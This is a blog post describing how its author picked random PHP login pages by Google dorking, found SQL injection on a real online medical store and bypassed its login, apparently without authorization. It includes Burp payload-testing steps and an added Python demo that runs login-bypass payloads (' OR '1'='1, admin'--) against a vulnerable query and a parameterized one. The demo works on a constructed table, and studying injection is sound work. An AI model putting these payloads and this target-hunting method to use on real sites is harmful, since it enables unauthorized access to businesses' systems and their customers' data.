How I found a SQL flaw on an online medical instrument store
On the auspicious day of the release of Avengers: Infinity War, I was so excited I couldn’t sleep while waiting for the movie. I was binge-watching YouTube videos related to the Avengers, and then I had the brilliant idea: why not hack something in the meantime? If I am not sleeping, why not use the time for something mischievous?
So let’s hack!
I wanted to practise my SQL injection skills, so I did a Google search for “inurl:login.php”. The ‘inurl’ dork gave me a list of PHP login pages, and PHP login pages tend to be more vulnerable to SQL injection attacks. After that I opened a series of the suggested login pages in new tabs and started checking for a site vulnerable to SQL injection.
Identifying the vulnerable site!
I went through the login pages I had opened in different tabs one by one (that’s how unoccupied I was). On each one I tried the most basic check for SQL injection: inserting a single apostrophe (‘) in the username field, leaving the password field empty and trying to log in. A login form that builds its query by string concatenation will pass the unbalanced quote straight to the database, which then fails with a syntax error. After a few attempts this website gave me a SQL error which looked something like this.
Testing with payloads!
Now, once I received this error message, I tried different payloads to assess how the username verification was actually working. One after another I input different payloads in a systematic way, which gave me a better picture of which payload could help me bypass the login authentication.
To carry out the SQL injection you have to try different payload combinations. First, you can run Burp Suite’s built-in list of SQL payloads against the form to understand how the login behaves; then look for responses whose length is out of the ordinary and inspect the response you received for those particular payloads. Once you understand which payloads affect the login in an unusual way, you can carry on from there with a manual SQL injection attack.
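To make the apostrophe check and the payload testing above concrete, here is an added example that is not part of the original post and not code from the site described. It builds a constructed in-memory SQLite users table (the real site presumably ran PHP against MySQL, so its exact error text would differ), implements a login check by string concatenation beside a parameterized one, and runs the same probe sequence against both: a lone apostrophe first, then a few common bypass payloads with the password field left empty, as in the write-up. The table contents, payload list and function names are all assumptions made for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample users table for the demo; not data from any real site."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users VALUES ('admin', 'correct horse battery staple')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, the pattern an apostrophe probe detects."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as e:
        # The database rejects the unbalanced quote: this is the "SQL error"
        # that a single apostrophe in the username field surfaces.
        return ("error", str(e))
    return ("ok", row[0]) if row else ("denied", None)


def login_safe(conn, username, password):
    """Same check with a parameterized query; user input is data, never SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return ("ok", row[0]) if row else ("denied", None)


# Probe sequence mirroring the write-up: the bare apostrophe, then bypass
# payloads. The password field is left empty for every probe.
PROBES = [
    "'",
    "' OR '1'='1",
    "admin'--",
    "admin' OR 1=1--",
]


def run_probes(conn, login):
    """Map each probe to the outcome class ('error', 'ok' or 'denied')."""
    return {p: login(conn, p, "")[0] for p in PROBES}


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        print(name)
        for probe, outcome in run_probes(db, fn).items():
            print(f"  {probe!r:22} -> {outcome}")
```

Two details are worth noticing when you run it. The bare apostrophe yields a database error from the concatenated query and a plain “denied” from the parameterized one, which is exactly the signal the apostrophe check looks for. And `' OR '1'='1` in the username alone does not bypass this form, because `AND` binds tighter than `OR` and the empty password still has to match; the comment-based payloads (`admin'--`) work because they cut the password clause off entirely. That is the kind of difference in behaviour that systematic payload testing reveals before you move on to a manual attack.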
So, that’s how I found a way to bypass the login of the online medical store.
If you enjoyed it, please do clap, and happy hacking!
Twitter : twitter.com/aditya12anand
LinkedIn : linkedin.com/in/aditya12anand/
E-mail : [email protected]